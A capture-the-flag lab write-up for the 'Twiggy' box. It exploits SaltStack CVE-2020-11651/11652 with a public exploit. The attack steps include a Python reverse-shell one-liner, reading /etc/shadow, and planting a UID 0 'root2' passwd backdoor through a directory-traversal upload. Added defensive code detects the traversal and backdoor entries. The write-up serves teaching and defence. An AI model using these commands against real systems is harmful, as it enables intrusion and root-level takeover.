# Twiggy

## Information Gathering

### Service Enumeration

`nmapAutomator.sh -H 192.168.134.62 -t full`

`nmapAutomator.sh -H 192.168.134.62 -t vulns`

![](/files/-Mad29lXd5pEjyZzBSRG)

### Port 80

Mezzanine, a Django-based CMS, is running.

![](/files/-Mad2Tweau1WS75GEsZr)

### Port 8000

The SaltStack Salt REST API (`salt-api`) is running, which tells us the host is a Salt master.

![](/files/-Mad2ljp5q3UDoM9Oqrp)

## Exploitation

SaltStack Salt before 3000.2 and before 2019.2.4 (which includes every 2017.\* and 2018.\* release) is affected by CVE-2020-11651 (an authentication bypass in the master's `ClearFuncs` class) and CVE-2020-11652 (a directory traversal in the file-serving functions). Together they give an unauthenticated attacker code execution on the Salt master, as well as arbitrary file read and write with the master's privileges. The public exploit talks to the master's ZeroMQ request port (4506 by default), not to the REST API on port 8000.

Exploit from: <https://www.exploit-db.com/exploits/48421>

![](/files/-Mad2tnSmxlRKTFvcf50)

We can try to get a reverse shell by having the master execute a Python one-liner:

```bash
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.49.134",443));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'
```

However, no connection ever comes back to our listener, presumably because outbound traffic from the target is filtered by a firewall.

We can, however, read arbitrary files. Since the Salt master runs as root, that includes both `/etc/passwd` and `/etc/shadow`.

![](/files/-Mad85ptIjSfNXEjwejA)

![](/files/-Mad88nR4C4u9d_RFyEu)

We can also write arbitrary files, which gives us a path to root without any shell: download `/etc/passwd`, append a second UID 0 account whose password hash sits directly in the password field, and write the file back. Any entry whose second field is not the `x` shadow marker is authenticated against that inline hash, so `/etc/shadow` is never consulted, and UID 0 makes the account root regardless of its name. Append the entry to the local copy of `passwd`:

```bash
echo "root2:bWBoOyE1sFaiQ:0:0:root:/root:/bin/bash" >> passwd
```

Note that this hash corresponds to our custom password, `mypass`. Without any algorithm flag, `openssl passwd` produces a traditional DES crypt(3) hash with a random two-character salt, so re-running it yields a different but equally valid hash.

```bash
$ openssl passwd mypass                                                    
bWBoOyE1sFaiQ
```

Upload the modified file. The destination is relative to the master's file root, and the `../` segments are exactly the directory traversal of CVE-2020-11652: `python3 48421.py --master 192.168.134.62 --upload-src passwd --upload-dest ../../../../../etc/passwd`

![](/files/-Mad8cMelAI3wA42-y2U)
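To make the traversal in the upload destination concrete, here is an added example (not code from the page, the exploit, or Salt itself) that contrasts a naive join of a file root with a user-supplied relative path against a join that refuses to leave the root. The file root `/srv/salt` is assumed; the functions are illustrative and are not Salt's own API.

```python
import posixpath

# Assumed base directory for the master's file roots (hypothetical value).
FILE_ROOT = "/srv/salt"


def unsafe_join(root, relative):
    """Naive join: '..' segments are honoured, so the caller can escape root.

    This is the shape of the bug behind the page's upload destination: the
    master concatenates its file root with an attacker-controlled path.
    """
    return posixpath.normpath(posixpath.join(root, relative))


def safe_join(root, relative):
    """Join and then verify the normalised result still lies under root.

    Raises ValueError for absolute inputs and for any path that resolves
    outside the root. Symlinks inside the root are not checked here; a real
    implementation would also realpath() the result before comparing.
    """
    root = posixpath.normpath(root)
    if relative.startswith("/"):
        raise ValueError("absolute paths are not allowed")
    candidate = posixpath.normpath(posixpath.join(root, relative))
    if candidate != root and not candidate.startswith(root + "/"):
        raise ValueError("path escapes file root: %s" % candidate)
    return candidate


def is_traversal(root, relative):
    """Return True when the naive join would land outside the root."""
    try:
        safe_join(root, relative)
        return False
    except ValueError:
        return True


if __name__ == "__main__":
    # The exact destination used against the Salt master on this box.
    dest = "../../../../../etc/passwd"
    print("naive join resolves to:", unsafe_join(FILE_ROOT, dest))
    print("traversal detected:", is_traversal(FILE_ROOT, dest))
    print("legitimate path:", safe_join(FILE_ROOT, "top.sls"))
```

The check compares normalised strings rather than counting `..` segments, because `foo/../../etc` and similar mixes would slip past a simple substring filter.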

Check that our user was correctly added:

![](/files/-Mad8iVgxoZ63q1UfCmZ)
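The same check can be automated from the defender's side. The following added example (my own code, not from the page) builds a passwd entry the way the `echo` above does, with a guard against stray `:` or newline characters, and then scans a constructed `/etc/passwd` for the two artefacts this technique leaves behind: an extra UID 0 account and a password field holding an inline hash instead of the `x` shadow marker. The sample file contents are made up for the example.

```python
# Reasons reported by the scanner, exposed as constants for callers.
REASON_EXTRA_UID0 = "UID 0 account not named root"
REASON_INLINE_HASH = "inline password hash bypasses /etc/shadow"
REASON_EMPTY_PASSWORD = "empty password field"
REASON_MALFORMED = "malformed entry"

PASSWD_FIELD_COUNT = 7


def build_passwd_entry(user, pw_hash, uid=0, gid=0, gecos="root",
                       home="/root", shell="/bin/bash"):
    """Assemble one /etc/passwd line; reject field values that would break
    the colon-separated format and produce an unintended extra entry."""
    fields = [user, pw_hash, str(uid), str(gid), gecos, home, shell]
    for value in fields:
        if ":" in value or "\n" in value:
            raise ValueError("field contains a passwd delimiter: %r" % value)
    return ":".join(fields)


def find_suspicious_accounts(passwd_text):
    """Return (user, reason) pairs for entries an incident responder should
    examine. Ordinary entries carry 'x' (hash lives in /etc/shadow) or a
    locked marker such as '*' or '!'; anything else is worth a look."""
    findings = []
    for line in passwd_text.splitlines():
        if not line.strip() or line.startswith("#"):
            continue
        parts = line.split(":")
        if len(parts) != PASSWD_FIELD_COUNT:
            findings.append((line, REASON_MALFORMED))
            continue
        user, pw_field, uid = parts[0], parts[1], parts[2]
        if uid == "0" and user != "root":
            findings.append((user, REASON_EXTRA_UID0))
        if pw_field == "x" or pw_field.startswith(("*", "!")):
            continue  # shadowed or locked: normal
        if pw_field == "":
            findings.append((user, REASON_EMPTY_PASSWORD))
        else:
            findings.append((user, REASON_INLINE_HASH))
    return findings


# Constructed sample: a normal file plus the backdoor entry from this write-up.
SAMPLE_PASSWD = "\n".join([
    "root:x:0:0:root:/root:/bin/bash",
    "daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin",
    "sync:*:4:65534:sync:/bin:/bin/sync",
    "twiggy:x:1000:1000::/home/twiggy:/bin/bash",
    build_passwd_entry("root2", "bWBoOyE1sFaiQ"),
]) + "\n"


if __name__ == "__main__":
    for user, reason in find_suspicious_accounts(SAMPLE_PASSWD):
        print("%s: %s" % (user, reason))
```

On a live host the equivalent one-liners are `awk -F: '$3 == 0' /etc/passwd` and `awk -F: '$2 != "x" && $2 !~ /^[*!]/' /etc/passwd`; the scanner above just makes the two conditions explicit and testable.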

Now, using the `root2:mypass` credentials, we can SSH into the server and land in a UID 0 shell. This works because password authentication is enabled; note that sshd applies `PermitRootLogin` to any UID 0 account, not just the one named `root`, so the server must also allow root password logins for this to succeed.

![](/files/-Mad8tuakeUdisiGsaU-)

![](/files/-Mad9-YQJUQSbWzp9B2C)
